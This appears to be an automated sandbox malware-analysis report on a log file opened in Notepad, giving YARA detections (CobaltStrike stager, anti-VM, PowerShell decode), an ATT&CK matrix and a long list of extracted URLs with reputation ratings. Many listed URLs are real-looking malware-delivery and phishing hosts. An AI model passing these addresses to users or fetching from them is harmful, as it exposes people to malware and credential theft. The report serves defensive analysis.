          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logStatic file information: File size 20971520 > 1048576
          Source: Binary string: )9 /!#SCPT:Trojan:PowerShell/Bumblebee.PDB04LNK!MTB source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mpengine.pdb OGPS source: notepad.exe, 00000000.00000002.608934300.000001CF7AD07000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: /!#SCPT:Trojan:PowerShell/Bumblebee.PDB04LNK!MTB source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: /!#SCPT:Trojan:PowerShell/Bumblebee.PDB04LNK!MTB source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE
          Source: Yara matchFile source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Z "/providers/microsoft.compute/virtualmachines/",
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logBinary or memory string: "/providers/microsoft.compute/virtualmachines/",
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logBinary or memory string: Z"/providers/microsoft.compute/virtualmachines/",

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell dedcode and execute
          Source: Yara matchFile source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE
          Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log VolumeInformation

          Remote Access Functionality

          barindex
          Yara detected CobaltStrike Stager
          Source: Yara matchFile source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE
          Source: Yara matchFile source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          1
          Replication Through Removable Media          		Windows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping1
          Security Software Discovery          		1
          Replication Through Removable Media          		Data from Local SystemExfiltration Over Other Network Medium1
          Proxy          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
          Peripheral Device Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager11
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log16%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://spr-updates.ddns.net/spr_updates.php-o0%Avira URL Cloudsafe
          http://www.bonusesfound.ml/update/index.php100%Avira URL Cloudmalware
          https://gengengma.com/wp-content/uploads/vipe_11/send.php0%Avira URL Cloudsafe
          https://doocument.m2diving.ml/fay/login.php?log0%Avira URL Cloudsafe
          http://www.bonusesfound.ml/update/index.php10%VirustotalBrowse
          https://hitechceramics.com/egab/processor.php0%Avira URL Cloudsafe
          http://shgshgwsdynationalobjindustrialat18ygs.duckdns.org/receipt/invoice_202121.doc100%Avira URL Cloudmalware
          https://www.sputnikradio.net/radio/news/100%Avira URL Cloudmalware
          https://partoniroo.com/n9/u.js&&pingo0.org&&cd0%Avira URL Cloudsafe
          https://acaciavictorias.com/sxmal.php0%Avira URL Cloudsafe
          https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php0%Avira URL Cloudsafe
          https://diarnondfireplace.com/dobo/xxx.php?user=0%Avira URL Cloudsafe
          http://usa-national.info/gpu/band/grumble.dot100%Avira URL Cloudmalware
          https://tulsabailbondfinancing.com/dglmzmfueublehbmzi5jb20=0%Avira URL Cloudsafe
          http://192.210.240.8/doc_document/188.doc100%Avira URL Cloudmalware
          http://snapper.genesysindonesia.com/excel/excelz/index.php?email=0%Avira URL Cloudsafe
          https://gez.org.zw/errorpages/load/0%Avira URL Cloudsafe
          https://jmcglone.com0%Avira URL Cloudsafe
          https://tph786.com/sale/images/avatar/100%Avira URL Cloudphishing
          http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email=100%Avira URL Cloudphishing
          https://blackberryizm.com/frontend/assets/images/favico/report-fedex.php100%Avira URL Cloudphishing
          https://raw.githubusercontent.com/s3cur3th1ssh1t/0%Avira URL Cloudsafe
          http://outfish.bounceme.net/outl.dot100%Avira URL Cloudmalware
          http://ppaauuaa11232.cc/dlx5rc.dotm100%Avira URL Cloudmalware
          https://mail.emifermetures.xyz/myguy/receiptswift.php0%Avira URL Cloudsafe
          http://103.133.106.72/ini/................wbk0%Avira URL Cloudsafe
          http://www.mygreatlearning.com0%Avira URL Cloudsafe
          https://myown.bio/vvg0%Avira URL Cloudsafe
          https://e-secure-log.ga/abu/next.php0%Avira URL Cloudsafe
          https://greatblueinds.com/ajx-admin/ckeditor/plugins/wsc/dialogs/3o9vbeip3k.php0%Avira URL Cloudsafe
          https://tpow.zeroworld.xyz/home/application/views/sistem/notifikasi/usqg66westx.php100%Avira URL Cloudphishing
          https://browserimprovements.com/check-opt-out?url=$0%Avira URL Cloudsafe
          http://windowsdefendergateway.duckdns.org/documents.doc100%Avira URL Cloudmalware
          http://83.166.246.59/sgz2/rejoice/lowered.dot100%Avira URL Cloudmalware
          http://23.94.174.158/document/invc_00000023444.wbk0%Avira URL Cloudsafe
          http://198.23.156.247/receipt/receipt.doc100%Avira URL Cloudmalware
          http://192.3.152.171/100%Avira URL Cloudmalware
          https://url.welimitless.in/bvmms0%Avira URL Cloudsafe
          https://hide.link/lfspz100%Avira URL Cloudphishing
          https://sitesimobisis.com.br/bin/0%Avira URL Cloudsafe
          http://103.167.90.69/receipt/inv_126776.wbk100%Avira URL Cloudmalware
          http://kitten-268.frge.io/article.html100%Avira URL Cloudmalware
          https://visualscope.org/visual/office/css/nelz.php0%Avira URL Cloudsafe
          http://usb.mine.nu/c.sh-o/users/shared/c.sh100%Avira URL Cloudphishing
          http://trialservice.genesystuna.com/io/excelz/index.php?email=0%Avira URL Cloudsafe
          http://49.234.67.167/100%Avira URL Cloudmalware
          http://filecopying.xyz/update/kbp08x100%Avira URL Cloudmalware
          http://media.vitkvitk.com/xmlstatic/ads/videoplaza/vittalia.html?df=100%Avira URL Cloudmalware
          http://3.104.223.22/dhl/receipt.doc100%Avira URL Cloudmalware
          http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc100%Avira URL Cloudmalware
          https://pigeonious.com/img/100%Avira URL Cloudmalware
          http://swipermachinereview.xyz/wp-includes/t3ow4kf0p0q8oo/100%Avira URL Cloudmalware
          http://103.167.93.37/invoice/invoice_000499000049.wbk100%Avira URL Cloudmalware
          https://rawcdn.githack.net/up.php?key=5100%Avira URL Cloudmalware
          https://armybar.hopto.org/remoteload.dotm0%Avira URL Cloudsafe
          http://private0091111.duckdns.org/qagj/gipsy.png0%Avira URL Cloudsafe
          https://hosteriaestilonorte.com.ar/admins/uzie/actions.php100%Avira URL Cloudphishing
          http://83.166.246.59/ua-lt98brkc2/perform/luck/100%Avira URL Cloudmalware
          https://www.mygreatlearning.com0%Avira URL Cloudsafe
          http://yourcontents.xyz/0758/0806pn100%Avira URL Cloudphishing
          http://pretence77.glorious.nonima.ru/elenapc/principles/nearly.mp3100%Avira URL Cloudmalware
          http://thrprivatecloudshareandfileprotectagent.duckdns.org/receipt/invoice_651254.doc100%Avira URL Cloudmalware
          https://teachon.aerialview.lk/systemdemo/uploads/addons/__macosx/live-class/f2u4p7u3jk.php100%Avira URL Cloudmalware
          https://fpvtunes.binaryprotectors.com/msreal/jreside0%Avira URL Cloudsafe
          http://false.grafitto.ru/dch00-01/rehearsal.dot100%Avira URL Cloudmalware
          http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg==0%Avira URL Cloudsafe
          http://www.poltc.cz/zackova/novak.exe-outfilec:0%Avira URL Cloudsafe
          https://office.michiganappellateblog.com/soft.dll100%Avira URL Cloudmalware
          http://103.167.90.177/shpdocument/invc_0098008.wbk100%Avira URL Cloudmalware
          https://ziengineeringco.com/project-arab-contracting/css/dahbzo4xg.php0%Avira URL Cloudsafe
          https://logz.live/frnd/0%Avira URL Cloudsafe
          https://wwdurl.com/3nav0%Avira URL Cloudsafe
          https://bb.realestateprivateportfolio.com/img/100%Avira URL Cloudmalware
          https://tiger.hotshot.sk/wp-admin/0%Avira URL Cloudsafe
          https://lidamtour.com/masivo/ala/cronsrt/corn.dot0%Avira URL Cloudsafe
          http://earium.ru/ua-lt5cg63120d6/country/0%Avira URL Cloudsafe
          http://www.theabigailbloomcakecompany.co.uk/wp-content/uploads/0%Avira URL Cloudsafe
          https://emicrosoftteam.com/scot/0%Avira URL Cloudsafe
          http://www.comeinbaby.com/updateerror/fiif100%Avira URL Cloudmalware
          http://209.127.20.13/b44u8j.dotm100%Avira URL Cloudmalware
          http://files.telefacer.com/1/2.html0%Avira URL Cloudsafe
          http://lump.semara.ru/dch00-01/counter/nearest/100%Avira URL Cloudmalware
          https://jeffmhall.net/lant/0%Avira URL Cloudsafe
          https://unlibroparatodos.mx/wp-content/themes/divi/epanel/css/tpcsfltfzf9r7yx.php0%Avira URL Cloudsafe
          https://www.vespang.cf/sizx/post.php0%Avira URL Cloudsafe
          http://atozlovebook.com/vision.iosapp-o%appdata%0%Avira URL Cloudsafe
          https://extraosseous.com/zik/document.php0%Avira URL Cloudsafe
          https://lidamtour.com/masivo/ala/cronsrt/0%Avira URL Cloudsafe
          https://luxtonace.com/luxton/plugins/ckeditor/plugins/a11yhelp/9gysz7pxb.php0%Avira URL Cloudsafe
          http://172.245.119.43/recept/34.doc100%Avira URL Cloudmalware
          http://107.173.143.102/hhh/invc_005400005400.wbk0%Avira URL Cloudsafe
          http://thomastongrealestate.com/skywkc/3415201.pnga100%Avira URL Cloudmalware
          https://ab.v-mail.online/?e=100%Avira URL Cloudphishing
          https://lidamtour.com/masivo/file/kmshost/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          No contacted domains info

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.bonusesfound.ml/update/index.phpnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmptrue
          • 10%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          http://spr-updates.ddns.net/spr_updates.php-oApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
          • Avira URL Cloud: safe
          		unknown
          https://gengengma.com/wp-content/uploads/vipe_11/send.phpnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
          • Avira URL Cloud: safe
          		unknown
          https://endodermic-needles.000webhostapp.com/clean.phpApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
            		high
            https://doocument.m2diving.ml/fay/login.php?lognotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://hitechceramics.com/egab/processor.phpnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://shgshgwsdynationalobjindustrialat18ygs.duckdns.org/receipt/invoice_202121.docnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://www.sputnikradio.net/radio/news/App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logtrue
            • Avira URL Cloud: malware
            		unknown
            https://partoniroo.com/n9/u.js&&pingo0.org&&cdApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
            • Avira URL Cloud: safe
            		unknown
            https://acaciavictorias.com/sxmal.phpnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://usa-national.info/gpu/band/grumble.dotApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logtrue
            • Avira URL Cloud: malware
            		unknown
            https://diarnondfireplace.com/dobo/xxx.php?user=notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.phpApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
            • Avira URL Cloud: safe
            		unknown
            https://tulsabailbondfinancing.com/dglmzmfueublehbmzi5jb20=notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://outfish.bounceme.net/outl.dotnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
            • Avira URL Cloud: malware
            		unknown
            http://snapper.genesysindonesia.com/excel/excelz/index.php?email=notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://jmcglone.comnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://192.210.240.8/doc_document/188.docnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://gez.org.zw/errorpages/load/App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.systweak.com/registrycleanerApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
              		high
              https://tph786.com/sale/images/avatar/notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              		unknown
              http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email=notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              		unknown
              https://blackberryizm.com/frontend/assets/images/favico/report-fedex.phpnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              		unknown
              https://raw.githubusercontent.com/s3cur3th1ssh1t/notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
              • Avira URL Cloud: safe
              		unknown
              http://ppaauuaa11232.cc/dlx5rc.dotmnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://mail.emifermetures.xyz/myguy/receiptswift.phpnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.mygreatlearning.comApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
              • Avira URL Cloud: safe
              		unknown
              http://103.133.106.72/ini/................wbkApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
              • Avira URL Cloud: safe
              		unknown
              https://myown.bio/vvgApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
              • Avira URL Cloud: safe
              		unknown
              https://e-secure-log.ga/abu/next.phpApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
              • Avira URL Cloud: safe
              		unknown
              https://browserimprovements.com/check-opt-out?url=$App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
              • Avira URL Cloud: safe
              		unknown
              https://greatblueinds.com/ajx-admin/ckeditor/plugins/wsc/dialogs/3o9vbeip3k.phpApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
              • Avira URL Cloud: safe
              		unknown
              http://windowsdefendergateway.duckdns.org/documents.docnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://tpow.zeroworld.xyz/home/application/views/sistem/notifikasi/usqg66westx.phpnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              		unknown
              http://83.166.246.59/sgz2/rejoice/lowered.dotApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
              • Avira URL Cloud: malware
              		unknown
              http://198.23.156.247/receipt/receipt.docnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://url.welimitless.in/bvmmsnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://23.94.174.158/document/invc_00000023444.wbknotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://hide.link/lfspzApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
              • Avira URL Cloud: phishing
              		unknown
              https://transfer.sh/get/0oulld/i9ch18.dotmnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://192.3.152.171/notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://sitesimobisis.com.br/bin/notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.167.90.69/receipt/inv_126776.wbkApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                • Avira URL Cloud: malware
                		unknown
                http://kitten-268.frge.io/article.htmlnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://usb.mine.nu/c.sh-o/users/shared/c.shnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                		unknown
                http://49.234.67.167/App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                • Avira URL Cloud: malware
                		unknown
                http://filecopying.xyz/update/kbp08xnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://media.vitkvitk.com/xmlstatic/ads/videoplaza/vittalia.html?df=notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://trialservice.genesystuna.com/io/excelz/index.php?email=notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://visualscope.org/visual/office/css/nelz.phpnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.docApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                • Avira URL Cloud: malware
                		unknown
                http://3.104.223.22/dhl/receipt.docnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://armybar.hopto.org/remoteload.dotmnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://pigeonious.com/img/notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://103.167.93.37/invoice/invoice_000499000049.wbknotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://hosteriaestilonorte.com.ar/admins/uzie/actions.phpnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                		unknown
                http://pretence77.glorious.nonima.ru/elenapc/principles/nearly.mp3notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://private0091111.duckdns.org/qagj/gipsy.pngApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                • Avira URL Cloud: safe
                		unknown
                http://towardsdatascience.comnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://swipermachinereview.xyz/wp-includes/t3ow4kf0p0q8oo/App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://rawcdn.githack.net/up.php?key=5notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://www.mygreatlearning.comApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://83.166.246.59/ua-lt98brkc2/perform/luck/notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://bitbucket.org/atlasover/atlassiancore/downloads/notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://thrprivatecloudshareandfileprotectagent.duckdns.org/receipt/invoice_651254.docnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://yourcontents.xyz/0758/0806pnnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    https://teachon.aerialview.lk/systemdemo/uploads/addons/__macosx/live-class/f2u4p7u3jk.phpApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://false.grafitto.ru/dch00-01/rehearsal.dotApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://fpvtunes.binaryprotectors.com/msreal/jresidenotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg==App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://office.michiganappellateblog.com/soft.dllApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://logz.live/frnd/App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://103.167.90.177/shpdocument/invc_0098008.wbknotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://ziengineeringco.com/project-arab-contracting/css/dahbzo4xg.phpnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.poltc.cz/zackova/novak.exe-outfilec:App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://wwdurl.com/3navApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://lidamtour.com/masivo/ala/cronsrt/corn.dotnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://bb.realestateprivateportfolio.com/img/notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://tiger.hotshot.sk/wp-admin/App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://earium.ru/ua-lt5cg63120d6/country/App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://emicrosoftteam.com/scot/App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.comeinbaby.com/updateerror/fiifnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://209.127.20.13/b44u8j.dotmApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.theabigailbloomcakecompany.co.uk/wp-content/uploads/notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.22find.com/?utm_source=b&utm_medium=App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                      		high
                      http://files.telefacer.com/1/2.htmlApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://lump.semara.ru/dch00-01/counter/nearest/notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://jeffmhall.net/lant/notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://unlibroparatodos.mx/wp-content/themes/divi/epanel/css/tpcsfltfzf9r7yx.phpnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://atozlovebook.com/vision.iosapp-o%appdata%notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://ramashardware.co.za/wp-fxm.phpApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                        		high
                        https://www.vespang.cf/sizx/post.phpApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://extraosseous.com/zik/document.phpApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://172.245.119.43/recept/34.docnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://luxtonace.com/luxton/plugins/ckeditor/plugins/a11yhelp/9gysz7pxb.phpApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
